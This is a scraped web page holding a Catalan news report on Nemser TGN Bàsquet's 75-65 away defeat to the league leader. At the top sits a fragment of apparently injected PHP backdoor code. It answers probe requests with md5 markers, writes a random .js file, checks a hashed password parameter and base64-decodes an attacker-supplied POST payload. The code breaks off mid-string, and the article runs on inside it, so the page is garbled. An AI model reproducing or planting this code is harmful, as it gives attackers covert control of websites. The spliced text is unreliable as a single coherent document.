function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" El Nemser TGN Bàsquet fa un gran partit però acaba perdent contra el líder (75-65) - Tgn Bàsquet Club -

El Nemser TGN Bàsquet fa un gran partit però acaba perdent contra el líder (75-65)

Updated: octubre 25, 2014

El Nemser TGN Bàsquet va fer un partit molt complet però no va rebre el premi que li pertocava a la pista del líder. El tècnic del conjunt lila, Jordi Hernández, va dir en la prèvia del matx que un dels objectius de cara al partit era recuperar sensacions fora de casa, jugar sense por, i l’equip ho va fer. Contra un rival dur, amb qualitat i que suma els seus partits per victòries (5 de 5), el Nemser TGN Bàsquet va plantar cara, va fer sentir el seu alè al clatell del seu adversari i no va guanyar per un pèl.

L’equip tarragoní va estar molt bé en moltes línies, fins i tot els tirs lliures, amb una sèrie immaculada de 17 de 17. Bones defenses i ràpids contraatacs contra un oponent que, tot s’ha de dir, sempre va dur el ritme de joc que més li convenia però que mai va poder desempellegar-se de les visitants. De fet, el resultat final és enganyós perquè a falta de 30 segons per acabar el partit el Nemser TGN Bàsquet només perdia per 5 punts, una diferència que va ser la tònica del matx excepte en el segon període, quan les liles se’n van anar al descans amb una diferència en contra de 10 punts (38-28). Van ser uns minuts en què les visitants van reclamar més rigorositat als col·legiats perquè L’Hospitalet va acabar els dos primers períodes amb només 2 faltes personals (en 20 minuts).

El partit va ser un festival encistellador (56-51 final del tercer quart) no exempt d’intensitat i en què, finalment, les locals es van endur el triomf. El Nemser TGN Bàsquet, amb aquesta derrota, continua sense conèixer què és guanyar fora del pavelló del Sagrat Cor.